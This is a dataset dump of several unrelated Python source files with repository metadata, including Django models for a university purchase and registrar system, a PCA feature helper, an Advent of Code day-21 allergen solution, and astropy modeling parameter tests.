inspecting_authority = models.CharField(max_length=200, default='0')
expected_purchase_date = models.DateField()
order_date = models.DateField(default=datetime.date.today)
purchase_status = models.IntegerField(choices=PURCHASE_STATUS, default=0)
# purchase_officer = models.ForeignKey(Staff, on_delete=models.CASCADE, default='0')
amount = models.IntegerField(default='0')
purchase_date = models.DateField(default='2018-06-01')
registrar_approve_tag = models.IntegerField(choices=APPROVE_TAG, default=0)
director_approve_tag = models.IntegerField(choices=APPROVE_TAG,default=0)
HOD_approve_tag = models.IntegerField(choices=APPROVE_TAG, default=0)
accounts_approve_tag = models.IntegerField(choices=APPROVE_TAG, default=0)
gem_tag = models.IntegerField(choices=APPROVE_TAG, default=0)
purchase_type = models.IntegerField(choices=PURCHASE_TYPE, default=0)
purpose = models.CharField(max_length=200, default=0)
budgetary_head = models.CharField(max_length=200, default=0)
invoice = models.FileField(default=0)
nature_of_item1 = models.IntegerField(choices=NATURE_OF_ITEM1, default=0)
nature_of_item2 = models.IntegerField(choices=NATURE_OF_ITEM2, default=0)
item_name = models.CharField(max_length=100, default=0)
expected_cost = models.IntegerField(default=0)
quantity = models.IntegerField(default=0)
class Meta:
db_table = 'apply_for_purchase'
class stock(models.Model):
item_name = models.CharField(max_length=100)
quantity = models.IntegerField(default='0')
item_type = models.IntegerField(choices=ITEM_TYPE, default='0')
class Meta:
db_table = 'stock'
class purchase_commitee(models.Model) :
local_comm_mem1 = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE,related_name='local_comm_mem1')
local_comm_mem2 = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE,related_name='local_comm_mem2')
local_comm_mem3 = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE,related_name='local_comm_mem3')
approve_mem1 = models.IntegerField(choices=APPROVE_TAG, default ='0')
approve_mem2 = models.IntegerField(choices=APPROVE_TAG, default ='0')
approve_mem3 = models.IntegerField(choices=APPROVE_TAG, default ='0')
class Meta:
db_table = 'purchase_commitee'
class quotations(models.Model) :
quotation1 = models.FileField()
quotation2 = models.FileField()
quotation3 = models.FileField()
class Meta:
db_table = 'quotations'
class Registrar_File(models.Model):
file_id = models.ForeignKey(Tracking, on_delete=models.CASCADE)
status = models.IntegerField(choices=Constants.STATUS, default=0)
approval = models.IntegerField(choices=Constants.APPROVAL, default=0)
section_name = models.CharField(max_length=50)
section_type = models.CharField(max_length=20)
class registrar_create_doc(models.Model):
file_name = models.CharField(max_length=50)
purpose = models.CharField(max_length=100)
Description = models.CharField(max_length=200)
file=models.FileField()
class registrar_director_section(models.Model):
file_name = models.CharField(max_length=50)
date = models.DateField()
purpose = models.CharField(max_length=100)
status = models.CharField(max_length=1,choices=Constants.STATUS, default=0)
class registrar_purchase_sales_section(models.Model):
file_name = models.CharField(max_length=50)
member1 = models.CharField(max_length=50)
member2 = models.CharField(max_length=50)
member3 = models.CharField(max_length=50)
date = models.DateField()
purpose = models.CharField(max_length=100)
status = models.IntegerField(choices=Constants.STATUS, default=0)
file = models.FileField()
class registrar_finance_section(models.Model):
file_name = models.CharField(max_length=50)
date = models.DateField()
purpose = models.CharField(max_length=100)
status = models.IntegerField(choices=Constants.STATUS)
file = models.FileField()
class registrar_establishment_section(models.Model):
person_name = models.CharField(max_length=50)
person_mail_id = models.CharField(max_length=50,default="xyz")
date = models.DateField()
duration = models.IntegerField()
post = models.CharField(max_length=100)
file = models.FileField()
class registrar_general_section(models.Model):
file_name = models.CharField(max_length=50)
date = models.DateField()
amount = models.IntegerField()
status = models.IntegerField(choices=Constants.STATUS, default=0)
file = models.ForeignKey(registrar_create_doc, on_delete=models.CASCADE)
class LTC(models.Model):
name = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE)
designation = models.ForeignKey(Designation, on_delete=models.CASCADE)
department = models.ForeignKey(DepartmentInfo, on_delete=models.CASCADE)
date_request = models.DateField()
leave = models.ForeignKey(Leave, on_delete=models.CASCADE)
travel_mode = models.CharField(max_length=10, choices=Constants.TRAVEL_CHOICES, default='ROAD')
advance = models.IntegerField(default=0)
family_details = models.TextField(max_length=500)
class Meta:
db_table = 'LTC'
def __str__(self):
return str(self.id)
class CPDA(models.Model):
name = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE)
designation = models.ForeignKey(Designation, on_delete=models.CASCADE)
PF_no = models.CharField(max_length=100)
purpose = models.CharField(max_length=100)
amoutn = models.IntegerField(default=0)
class Meta:
db_table = 'CPDA'
def __str__(self):
return str(self.id)
class Auto_fair_claim(models.Model):
name = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE)
purpose = models.CharField(max_length=100)
amount = models.IntegerField(default=0)
auto_reg_no = models.CharField(max_length=50)
auto_contact = models.IntegerField(default=0)
bill = models.FileField(upload_to='hod/')
date = models.DateField();
class Meta:
db_table = 'auto_fair_claim'
class Teaching_credits1(models.Model):
roll_no = models.CharField(max_length=100,primary_key=True)
name = models.CharField(max_length=100)
programme = models.CharField(max_length=100)
branch = models.CharField(max_length=100)
course1 = models.CharField(choices=Constants.TICK_TYPE,
max_length=100, default='NO')
course2 = models.CharField(choices=Constants.TICK_TYPE,
max_length=100, default='NO')
course3 = models.CharField(choices=Constants.TICK_TYPE,
max_length=100, default='NO')
tag = models.IntegerField(default=0)
class Meta:
db_table = 'Teaching_credits1'
def __str__(self):
return str(self.roll_no)
class Assigned_Teaching_credits(models.Model):
roll_no = models.ForeignKey(Teaching_credits1, on_delete=models.CASCADE)
assigned_course = models.CharField(max_length=100,default='NO')
class Meta:
db_table = 'Assigned_Teaching_credits'
class Lab(models.Model):
lab = models.CharField(max_length=10)
lab_instructor = models.CharField(max_length=30)
day = models.CharField(max_length=10,choices=Constants.DAY_CHOICES, default='Monday')
s_time = models.CharField(max_length=6, default='0:00')
e_time = models.CharField(max_length=6, default='0:00')
class Meta:
db_table = 'Lab'
def __str__(self):
return str(self.lab)
class TA_assign(models.Model):
roll_no = models.ForeignKey(ExtraInfo, on_delete=models.CASCADE, related_name='TA_id')
lab = models.ForeignKey(Lab, on_delete=models.CASCADE)
balance = models.IntegerField(default=2)
class Meta:
db_table = 'TA_assign'
def __str__(self):
return str(self.id)
class Registrar_response(models.Model):
track_id = models.ForeignKey(Tracking, on_delete=models.CASCADE, related_name='t_id')
remark = models.CharField(max_length=50, default='')
status = models.CharField(max_length=20, default='')
class Meta:
db_table = 'Registrar_response'
def __str__(self):
return str(self.id)+" "+str(track_id)+status
| 35.476603
| 120
| 0.650464
|
eaf88d293845dfd34442f77f6bc9214d7f6c1903
| 242
|
py
|
Python
|
gira_homeserver_api/devices/normalized_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 5
|
2020-03-17T12:45:50.000Z
|
2022-03-07T10:55:50.000Z
|
gira_homeserver_api/devices/normalized_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 3
|
2020-04-17T09:53:45.000Z
|
2021-01-25T22:14:14.000Z
|
gira_homeserver_api/devices/normalized_device.py
|
leoyn/gira-homeserver-api
|
7d642413a56078f694518d9189b4b7cc9776482d
|
[
"MIT"
] | 1
|
2020-04-17T06:51:50.000Z
|
2020-04-17T06:51:50.000Z
|
from .device import Device
class NormalizedDevice(Device):
def setValue(self, value):
if value >= 0 and value <= 1:
super().setValue(round(value * 100))
def getValue(self):
return super().getValue() / 100
| 26.888889
| 48
| 0.615702
|
15fc56151c00c72905359ab7d19b9e49e51d2941
| 28
|
py
|
Python
|
__init__.py
|
enyert/openacademy-project
|
76fb4fa9cd885d0b63f1091a67cc91bc1a3498c0
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
enyert/openacademy-project
|
76fb4fa9cd885d0b63f1091a67cc91bc1a3498c0
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
enyert/openacademy-project
|
76fb4fa9cd885d0b63f1091a67cc91bc1a3498c0
|
[
"Apache-2.0"
] | null | null | null |
from . import model,wizard
| 9.333333
| 26
| 0.75
|
9b5411e2ff42b727eedb384bc37d81d8dcdfcd48
| 664
|
py
|
Python
|
src/features/build_features.py
|
jonhilgart22/data-science-is-software
|
675e945a53ef595c729dc13c338439e42572e1f5
|
[
"MIT"
] | 22
|
2016-03-18T19:34:23.000Z
|
2021-01-03T14:32:38.000Z
|
src/features/build_features.py
|
jonhilgart22/data-science-is-software
|
675e945a53ef595c729dc13c338439e42572e1f5
|
[
"MIT"
] | 1
|
2016-03-18T19:48:12.000Z
|
2016-03-19T20:25:11.000Z
|
src/features/build_features.py
|
jonhilgart22/data-science-is-software
|
675e945a53ef595c729dc13c338439e42572e1f5
|
[
"MIT"
] | 18
|
2016-03-18T19:34:47.000Z
|
2020-08-06T07:47:24.000Z
|
import numpy as np
import pandas as pd
def remove_invalid_data(path):
""" Takes a path to a water pumps csv, loads in pandas, removes
invalid columns and returns the dataframe.
"""
df = pd.read_csv(path, index_col=0)
invalid_values = {
'amount_tsh': {0: np.nan},
'longitude': {0: np.nan},
'installer': {0: np.nan},
'construction_year': {0: np.nan},
}
# drop rows with invalid values
df.replace(invalid_values, inplace=True)
df.dropna(how="any", inplace=True)
return df
def gimme_the_mean(series):
if isinstance(series, float):
return series
return np.mean(series)
| 22.133333
| 67
| 0.626506
|
9a129db8cbfa3311895dc1efa6fba4fb9f94edda
| 1,016
|
py
|
Python
|
finance_ml/features/orth.py
|
xaviergoby/finance_ml
|
c348556fa3e13417e8fcf02999f42d5e72f0501b
|
[
"MIT"
] | 1
|
2018-12-14T18:51:29.000Z
|
2018-12-14T18:51:29.000Z
|
finance_ml/features/orth.py
|
xaviergoby/finance_ml
|
c348556fa3e13417e8fcf02999f42d5e72f0501b
|
[
"MIT"
] | null | null | null |
finance_ml/features/orth.py
|
xaviergoby/finance_ml
|
c348556fa3e13417e8fcf02999f42d5e72f0501b
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
def get_e_vec(dot, var_thres):
e_val, e_vec = np.linalg.eigh(dot)
# Descending order
idx = e_val.argsort()[::-1]
e_val = e_val[idx]
e_vec = e_vec[:, idx]
# Use only positive ones
e_val = pd.Series(e_val, index=['PC_' + str(i + 1) for i in range(e_val.shape[0])])
e_vec = pd.DataFrame(e_vec, index=dot.index, columns=e_val.index)
e_vec = e_vec.loc[:, e_val > 0]
e_val = e_val.loc[e_val > 0]
# Reduce dimension with threashold
cum_var = e_val.cumsum() / e_val.sum()
dim = cum_var.values.searchsorted(var_thres)
e_val = e_val.iloc[:dim+1]
e_vec = e_vec.iloc[:, :dim+1]
return e_val, e_vec
def orth_feats(dfX, var_thres=.95):
dfZ = dfX.sub(dfX.mean(), axis=1).div(dfX.std(), axis=1)
dot = pd.DataFrame(np.dot(dfZ.T, dfZ), index=dfX.columns, columns=dfX.columns)
e_val, e_vec = get_e_vec(dot, var_thres)
dfP = pd.DataFrame(np.dot(dfZ, e_vec), index=dfZ.index, columns=e_vec.columns)
return dfP
| 33.866667
| 87
| 0.650591
|
8eb85e64d669cc985bd58fb02c8540c7914c4e70
| 6,371
|
py
|
Python
|
rob_kovach/puzzle_21.py
|
techartorg/Advent_of_Code_2020
|
ae21164bc126352e7a2e9c9c6a0017ccb9d946cc
|
[
"MIT"
] | 3
|
2020-11-16T15:20:11.000Z
|
2020-12-11T17:01:42.000Z
|
rob_kovach/puzzle_21.py
|
techartorg/Advent_of_Code_2020
|
ae21164bc126352e7a2e9c9c6a0017ccb9d946cc
|
[
"MIT"
] | null | null | null |
rob_kovach/puzzle_21.py
|
techartorg/Advent_of_Code_2020
|
ae21164bc126352e7a2e9c9c6a0017ccb9d946cc
|
[
"MIT"
] | 1
|
2020-12-13T04:42:44.000Z
|
2020-12-13T04:42:44.000Z
|
"""
Advent of Code: Day 21 - Allergen Assessment
--- Part 1 ---
You reach the train's last stop and the closest you can get to your vacation
island without getting wet. There aren't even any boats here, but nothing
can stop you now: you build a raft. You just need a few days' worth of food
for your journey.
You don't speak the local language, so you can't read any ingredients lists.
However, sometimes, allergens are listed in a language you do understand.
You should be able to use this information to determine which ingredient
contains which allergen and work out which foods are safe to take with you
on your trip.
You start by compiling a list of foods (your puzzle input), one food per
line. Each line includes that food's ingredients list followed by some or
all of the allergens the food contains.
Each allergen is found in exactly one ingredient. Each ingredient contains
zero or one allergen. Allergens aren't always marked; when they're listed
(as in (contains nuts, shellfish) after an ingredients list), the
ingredient that contains each listed allergen will be somewhere in the
corresponding ingredients list. However, even if an allergen isn't listed,
the ingredient that contains that allergen could still be present: maybe
they forgot to label it, or maybe it was labeled in a language you
don't know.
For example, consider the following list of foods:
mxmxvkd kfcds sqjhc nhms (contains dairy, fish)
trh fvjkl sbzzf mxmxvkd (contains dairy)
sqjhc fvjkl (contains soy)
sqjhc mxmxvkd sbzzf (contains fish)
The first food in the list has four ingredients (written in a language you
don't understand): mxmxvkd, kfcds, sqjhc, and nhms. While the food might
contain other allergens, a few allergens the food definitely contains are
listed afterward: dairy and fish.
The first step is to determine which ingredients can't possibly contain
any of the allergens in any food in your list. In the above example, none
of the ingredients kfcds, nhms, sbzzf, or trh can contain an allergen.
Counting the number of times any of these ingredients appear in any
ingredients list produces 5: they all appear once each except sbzzf, which
appears twice.
Determine which ingredients cannot possibly contain any of the allergens
in your list. How many times do any of those ingredients appear?
--- Part 2 ---
Now that you've isolated the inert ingredients, you should have enough
information to figure out which ingredient contains which allergen.
In the above example:
mxmxvkd contains dairy.
sqjhc contains fish.
fvjkl contains soy.
Arrange the ingredients alphabetically by their allergen and separate
them by commas to produce your canonical dangerous ingredient list.
(There should not be any spaces in your canonical dangerous ingredient
list.) In the above example, this would be mxmxvkd,sqjhc,fvjkl.
Time to stock your raft with supplies. What is your canonical dangerous
ingredient list?
"""
from collections import defaultdict
from functools import reduce
LOCATION = __file__
INPUT_ = open(LOCATION.replace('.py', '_input.txt')).read()
# Create a Dictionary that stores the possible ingredients that
# may contain the allergen.
POSSIBILITIES = defaultdict(list)
# Store a master list of all ingredients (for Part 1).
# Don't remove duplicate entries!
ALL_INGREDIENTS = []
# Parse the input.
for x in INPUT_.splitlines():
ingredients, allergens = x.split('(')
ingredients = ingredients.strip()
ingredients = ingredients.split(' ')
ALL_INGREDIENTS.extend(ingredients)
allergens = allergens.replace(')', '')
allergens = allergens.replace('contains', '')
allergens = allergens.split(',')
allergens = [x.strip() for x in allergens]
for a in allergens:
POSSIBILITIES[a].append(ingredients)
# For each allergen, we know the possible list of ingredients per food.
# Find the common ingredients from each food for each allergen to exclude
# ingredients that are not common to all the foods.
REDUCED_POSSIBILITIES = {}
for allergen, ingredients in POSSIBILITIES.items():
# Find the common set of possibilities amoung all foods.
reduced = list(reduce(lambda i, j: i & j, (set(x) for x in ingredients)))
REDUCED_POSSIBILITIES[allergen] = reduced
#print(REDUCED_POSSIBILITIES)
# Now that we have excluded all ingredients that couldn't contain
# the allergens, we know which ingredients to remove the list of
# all ingredients (for Part 1).
ALLERGENS = []
for x in REDUCED_POSSIBILITIES.values():
ALLERGENS.extend(x)
ALLERGENS = list(set(ALLERGENS))
#print(ALLERGENS)
# Remove all the allergens from the master list of ingredients.
# Count the remaining ingredient for the answer to Part 1.
for item in ALL_INGREDIENTS[:]:
if item in ALLERGENS:
ALL_INGREDIENTS.remove(item)
print(f'Part 1 Answer: {len(ALL_INGREDIENTS)}')
# --- Part 2 ---
# Now that we know the possible ingredient that each allergen could be,
# we have to use a process of elimination to match each allergen to a
# specific ingredient.
# Keep track of which allergens have been translated.
TRANSLATED = []
# Keep track of the allergen and its matched ingredient.
TRANSLATION = {}
while len(TRANSLATED) < len(REDUCED_POSSIBILITIES.keys()):
# Loop over the dictionary of allergens, if they match just
# one ingredient, remove that possibility from every other
# allergen's list of potential ingredients.
for allergen, ingredients in REDUCED_POSSIBILITIES.items():
if allergen in TRANSLATED:
continue
if len(ingredients) == 1:
match = ingredients[0]
#print(f'{allergen} translates to {match}.')
TRANSLATION[allergen] = match
if not allergen in TRANSLATED:
TRANSLATED.append(match)
for allergen, ingredients in REDUCED_POSSIBILITIES.items():
if allergen in TRANSLATED:
continue
for matched in TRANSLATION.values():
if matched in ingredients:
ingredients.remove(matched)
#print(TRANSLATED)
#print(TRANSLATION)
# To get the answer for Part 2 we have to sort the allergen
# alphabetically, then joined the translated values together.
sorted_keys = sorted(TRANSLATION.keys())
answer = ','.join([TRANSLATION[x] for x in sorted_keys])
print(f'Part 2 Answer: {answer}')
| 37.476471
| 77
| 0.740857
|
d3f626ee37d5fd4a1ebea5f8d6abba2d6a52594d
| 22,001
|
py
|
Python
|
astropy/modeling/tests/test_parameters.py
|
adivijaykumar/astropy
|
0fd7ae818fed3abe4c468170a507d52ef91dc7e8
|
[
"BSD-3-Clause"
] | 4
|
2021-03-25T15:49:56.000Z
|
2021-12-15T09:10:04.000Z
|
astropy/modeling/tests/test_parameters.py
|
adivijaykumar/astropy
|
0fd7ae818fed3abe4c468170a507d52ef91dc7e8
|
[
"BSD-3-Clause"
] | 20
|
2021-05-03T18:02:23.000Z
|
2022-03-12T12:01:04.000Z
|
astropy/modeling/tests/test_parameters.py
|
adivijaykumar/astropy
|
0fd7ae818fed3abe4c468170a507d52ef91dc7e8
|
[
"BSD-3-Clause"
] | 3
|
2021-03-28T16:13:00.000Z
|
2021-07-16T10:27:25.000Z
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Tests models.parameters
"""
# pylint: disable=invalid-name
import itertools
import pytest
import numpy as np
from astropy.modeling import models, fitting
from astropy.modeling.core import Model, FittableModel
from astropy.modeling.parameters import Parameter, InputParameterError
from astropy.utils.data import get_pkg_data_filename
from . import irafutil
def setter1(val):
return val
def setter2(val, model):
model.do_something(val)
return val * model.p
class SetterModel(FittableModel):
n_inputs = 2
n_outputs = 1
xc = Parameter(default=1, setter=setter1)
yc = Parameter(default=1, setter=setter2)
def do_something(self, v):
pass
def __init__(self, xc, yc, p):
self.p = p # p is a value intended to be used by the setter
super().__init__()
self.xc = xc
self.yc = yc
def evaluate(self, x, y, xc, yc):
return (x - xc)**2 + (y - yc)**2
def do_something(self, v):
pass
class TParModel(Model):
"""
A toy model to test parameters machinery
"""
coeff = Parameter()
e = Parameter()
def __init__(self, coeff, e, **kwargs):
super().__init__(coeff=coeff, e=e, **kwargs)
@staticmethod
def evaluate(coeff, e):
pass
class MockModel(FittableModel):
alpha = Parameter(name='alpha', default=42)
@staticmethod
def evaluate(*args):
pass
def test_parameter_properties():
"""Test if getting / setting of Parameter properties works."""
p = Parameter('alpha', default=1)
assert p.name == 'alpha'
# Parameter names are immutable
with pytest.raises(AttributeError):
p.name = 'beta'
assert p.fixed is False
p.fixed = True
assert p.fixed is True
assert p.tied is False
p.tied = lambda _: 0
p.tied = False
assert p.tied is False
assert p.min is None
p.min = 42
assert p.min == 42
p.min = None
assert p.min is None
assert p.max is None
p.max = 41
assert p.max == 41
def test_parameter_operators():
"""Test if the parameter arithmetic operators work."""
par = Parameter('alpha', default=42)
num = 42.
val = 3
assert par - val == num - val
assert val - par == val - num
assert par / val == num / val
assert val / par == val / num
assert par ** val == num ** val
assert val ** par == val ** num
assert par < 45
assert par > 41
assert par <= par
assert par >= par
assert par == par
assert -par == -num
assert abs(par) == abs(num)
# Test inherited models
class M1(Model):
m1a = Parameter(default=1.)
m1b = Parameter(default=5.)
def evaluate():
pass
class M2(M1):
m2c = Parameter(default=11.)
class M3(M2):
m3d = Parameter(default=20.)
def test_parameter_inheritance():
mod = M3()
assert mod.m1a == 1.
assert mod.m1b == 5.
assert mod.m2c == 11.
assert mod.m3d == 20.
for key in ['m1a', 'm1b', 'm2c', 'm3d']:
assert key in mod.__dict__
assert mod.param_names == ('m1a', 'm1b', 'm2c', 'm3d')
def test_param_metric():
mod = M3()
assert mod._param_metrics['m1a']['slice'] == slice(0, 1)
assert mod._param_metrics['m1b']['slice'] == slice(1, 2)
assert mod._param_metrics['m2c']['slice'] == slice(2, 3)
assert mod._param_metrics['m3d']['slice'] == slice(3, 4)
mod._parameters_to_array()
assert (mod._parameters == np.array([1., 5., 11., 20], dtype=np.float64)).all()
class TestParameters:
def setup_class(self):
"""
Unit tests for parameters
Read an iraf database file created by onedspec.identify. Use the
information to create a 1D Chebyshev model and perform the same fit.
Create also a gausian model.
"""
test_file = get_pkg_data_filename('data/idcompspec.fits')
f = open(test_file)
lines = f.read()
reclist = lines.split("begin")
f.close()
record = irafutil.IdentifyRecord(reclist[1])
self.icoeff = record.coeff
order = int(record.fields['order'])
self.model = models.Chebyshev1D(order - 1)
self.gmodel = models.Gaussian1D(2, mean=3, stddev=4)
self.linear_fitter = fitting.LinearLSQFitter()
self.x = record.x
self.y = record.z
self.yy = np.array([record.z, record.z])
def test_set_parameters_as_list(self):
"""Tests updating parameters using a list."""
self.model.parameters = [30, 40, 50, 60, 70]
assert (self.model.parameters == [30., 40., 50., 60, 70]).all()
def test_set_parameters_as_array(self):
"""Tests updating parameters using an array."""
self.model.parameters = np.array([3, 4, 5, 6, 7])
assert (self.model.parameters == [3., 4., 5., 6., 7.]).all()
def test_set_as_tuple(self):
"""Tests updating parameters using a tuple."""
self.model.parameters = (1, 2, 3, 4, 5)
assert (self.model.parameters == [1, 2, 3, 4, 5]).all()
def test_set_model_attr_seq(self):
"""
Tests updating the parameters attribute when a model's
parameter (in this case coeff) is updated.
"""
self.model.parameters = [0, 0., 0., 0, 0]
self.model.c0 = 7
assert (self.model.parameters == [7, 0., 0., 0, 0]).all()
def test_set_model_attr_num(self):
"""Update the parameter list when a model's parameter is updated."""
self.gmodel.amplitude = 7
assert (self.gmodel.parameters == [7, 3, 4]).all()
def test_set_item(self):
"""Update the parameters using indexing."""
self.model.parameters = [1, 2, 3, 4, 5]
tpar = self.model.parameters
tpar[0] = 10.
self.model.parameters = tpar
assert (self.model.parameters == [10, 2, 3, 4, 5]).all()
assert self.model.c0 == 10
def test_wrong_size1(self):
"""
Tests raising an error when attempting to reset the parameters
using a list of a different size.
"""
with pytest.raises(InputParameterError):
self.model.parameters = [1, 2, 3]
def test_wrong_size2(self):
"""
Tests raising an exception when attempting to update a model's
parameter (in this case coeff) with a sequence of the wrong size.
"""
with pytest.raises(InputParameterError):
self.model.c0 = [1, 2, 3]
def test_wrong_shape(self):
"""
Tests raising an exception when attempting to update a model's
parameter and the new value has the wrong shape.
"""
with pytest.raises(InputParameterError):
self.gmodel.amplitude = [1, 2]
def test_par_against_iraf(self):
"""
Test the fitter modifies model.parameters.
Uses an iraf example.
"""
new_model = self.linear_fitter(self.model, self.x, self.y)
np.testing.assert_allclose(
new_model.parameters,
np.array([4826.1066602783685, 952.8943813407858, 12.641236013982386,
-1.7910672553339604, 0.90252884366711317]),
rtol=10 ** (-2))
def testPolynomial1D(self):
d = {'c0': 11, 'c1': 12, 'c2': 13, 'c3': 14}
p1 = models.Polynomial1D(3, **d)
np.testing.assert_equal(p1.parameters, [11, 12, 13, 14])
def test_poly1d_multiple_sets(self):
p1 = models.Polynomial1D(3, n_models=3)
np.testing.assert_equal(p1.parameters, [0.0, 0.0, 0.0, 0, 0, 0,
0, 0, 0, 0, 0, 0])
np.testing.assert_array_equal(p1.c0, [0, 0, 0])
p1.c0 = [10, 10, 10]
np.testing.assert_equal(p1.parameters, [10.0, 10.0, 10.0, 0, 0,
0, 0, 0, 0, 0, 0, 0])
def test_par_slicing(self):
"""
Test assigning to a parameter slice
"""
p1 = models.Polynomial1D(3, n_models=3)
p1.c0[:2] = [10, 10]
np.testing.assert_equal(p1.parameters, [10.0, 10.0, 0.0, 0, 0,
0, 0, 0, 0, 0, 0, 0])
def test_poly2d(self):
p2 = models.Polynomial2D(degree=3)
p2.c0_0 = 5
np.testing.assert_equal(p2.parameters, [5, 0, 0, 0, 0, 0, 0, 0, 0, 0])
def test_poly2d_multiple_sets(self):
kw = {'c0_0': [2, 3], 'c1_0': [1, 2], 'c2_0': [4, 5],
'c0_1': [1, 1], 'c0_2': [2, 2], 'c1_1': [5, 5]}
p2 = models.Polynomial2D(2, **kw)
np.testing.assert_equal(p2.parameters, [2, 3, 1, 2, 4, 5,
1, 1, 2, 2, 5, 5])
def test_shift_model_parameters1d(self):
sh1 = models.Shift(2)
sh1.offset = 3
assert sh1.offset == 3
assert sh1.offset.value == 3
def test_scale_model_parametersnd(self):
sc1 = models.Scale([2, 2])
sc1.factor = [3, 3]
assert np.all(sc1.factor == [3, 3])
np.testing.assert_array_equal(sc1.factor.value, [3, 3])
class TestMultipleParameterSets:
def setup_class(self):
self.x1 = np.arange(1, 10, .1)
self.y, self.x = np.mgrid[:10, :7]
self.x11 = np.array([self.x1, self.x1]).T
self.gmodel = models.Gaussian1D([12, 10], [3.5, 5.2], stddev=[.4, .7],
n_models=2)
def test_change_par(self):
"""
Test that a change to one parameter as a set propagates to param_sets.
"""
self.gmodel.amplitude = [1, 10]
np.testing.assert_almost_equal(
self.gmodel.param_sets,
np.array([[1.,
10],
[3.5,
5.2],
[0.4,
0.7]]))
np.all(self.gmodel.parameters == [1.0, 10.0, 3.5, 5.2, 0.4, 0.7])
def test_change_par2(self):
"""
Test that a change to one single parameter in a set propagates to
param_sets.
"""
self.gmodel.amplitude[0] = 11
np.testing.assert_almost_equal(
self.gmodel.param_sets,
np.array([[11.,
10],
[3.5,
5.2],
[0.4,
0.7]]))
np.all(self.gmodel.parameters == [11.0, 10.0, 3.5, 5.2, 0.4, 0.7])
def test_change_parameters(self):
self.gmodel.parameters = [13, 10, 9, 5.2, 0.4, 0.7]
np.testing.assert_almost_equal(self.gmodel.amplitude.value, [13., 10.])
np.testing.assert_almost_equal(self.gmodel.mean.value, [9., 5.2])
class TestParameterInitialization:
"""
This suite of tests checks most if not all cases if instantiating a model
with parameters of different shapes/sizes and with different numbers of
parameter sets.
"""
def test_single_model_scalar_parameters(self):
t = TParModel(10, 1)
assert len(t) == 1
assert t.model_set_axis is False
assert np.all(t.param_sets == [[10], [1]])
assert np.all(t.parameters == [10, 1])
assert t.coeff.shape == ()
assert t.e.shape == ()
def test_single_model_scalar_and_array_parameters(self):
t = TParModel(10, [1, 2])
assert len(t) == 1
assert t.model_set_axis is False
assert np.issubdtype(t.param_sets.dtype, np.object_)
assert len(t.param_sets) == 2
assert np.all(t.param_sets[0] == [10])
assert np.all(t.param_sets[1] == [[1, 2]])
assert np.all(t.parameters == [10, 1, 2])
assert t.coeff.shape == ()
assert t.e.shape == (2,)
def test_single_model_1d_array_parameters(self):
t = TParModel([10, 20], [1, 2])
assert len(t) == 1
assert t.model_set_axis is False
assert np.all(t.param_sets == [[[10, 20]], [[1, 2]]])
assert np.all(t.parameters == [10, 20, 1, 2])
assert t.coeff.shape == (2,)
assert t.e.shape == (2,)
def test_single_model_1d_array_different_length_parameters(self):
with pytest.raises(InputParameterError):
# Not broadcastable
t = TParModel([1, 2], [3, 4, 5])
def test_single_model_2d_array_parameters(self):
t = TParModel([[10, 20], [30, 40]], [[1, 2], [3, 4]])
assert len(t) == 1
assert t.model_set_axis is False
assert np.all(t.param_sets == [[[[10, 20], [30, 40]]],
[[[1, 2], [3, 4]]]])
assert np.all(t.parameters == [10, 20, 30, 40, 1, 2, 3, 4])
assert t.coeff.shape == (2, 2)
assert t.e.shape == (2, 2)
def test_single_model_2d_non_square_parameters(self):
coeff = np.array([[10, 20], [30, 40], [50, 60]])
e = np.array([[1, 2], [3, 4], [5, 6]])
t = TParModel(coeff, e)
assert len(t) == 1
assert t.model_set_axis is False
assert np.all(t.param_sets == [[[[10, 20], [30, 40], [50, 60]]],
[[[1, 2], [3, 4], [5, 6]]]])
assert np.all(t.parameters == [10, 20, 30, 40, 50, 60,
1, 2, 3, 4, 5, 6])
assert t.coeff.shape == (3, 2)
assert t.e.shape == (3, 2)
t2 = TParModel(coeff.T, e.T)
assert len(t2) == 1
assert t2.model_set_axis is False
assert np.all(t2.param_sets == [[[[10, 30, 50], [20, 40, 60]]],
[[[1, 3, 5], [2, 4, 6]]]])
assert np.all(t2.parameters == [10, 30, 50, 20, 40, 60,
1, 3, 5, 2, 4, 6])
assert t2.coeff.shape == (2, 3)
assert t2.e.shape == (2, 3)
# Not broadcastable
with pytest.raises(InputParameterError):
TParModel(coeff, e.T)
with pytest.raises(InputParameterError):
TParModel(coeff.T, e)
def test_single_model_2d_broadcastable_parameters(self):
t = TParModel([[10, 20, 30], [40, 50, 60]], [1, 2, 3])
assert len(t) == 1
assert t.model_set_axis is False
assert len(t.param_sets) == 2
assert np.issubdtype(t.param_sets.dtype, np.object_)
assert np.all(t.param_sets[0] == [[[10, 20, 30], [40, 50, 60]]])
assert np.all(t.param_sets[1] == [[1, 2, 3]])
assert np.all(t.parameters == [10, 20, 30, 40, 50, 60, 1, 2, 3])
@pytest.mark.parametrize(('p1', 'p2'), [
(1, 2), (1, [2, 3]), ([1, 2], 3), ([1, 2, 3], [4, 5]),
([1, 2], [3, 4, 5])])
def test_two_model_incorrect_scalar_parameters(self, p1, p2):
with pytest.raises(InputParameterError):
TParModel(p1, p2, n_models=2)
@pytest.mark.parametrize('kwargs', [
{'n_models': 2}, {'model_set_axis': 0},
{'n_models': 2, 'model_set_axis': 0}])
def test_two_model_scalar_parameters(self, kwargs):
t = TParModel([10, 20], [1, 2], **kwargs)
assert len(t) == 2
assert t.model_set_axis == 0
assert np.all(t.param_sets == [[10, 20], [1, 2]])
assert np.all(t.parameters == [10, 20, 1, 2])
assert t.coeff.shape == (2,)
assert t.e.shape == (2,)
@pytest.mark.parametrize('kwargs', [
{'n_models': 2}, {'model_set_axis': 0},
{'n_models': 2, 'model_set_axis': 0}])
def test_two_model_scalar_and_array_parameters(self, kwargs):
t = TParModel([10, 20], [[1, 2], [3, 4]], **kwargs)
assert len(t) == 2
assert t.model_set_axis == 0
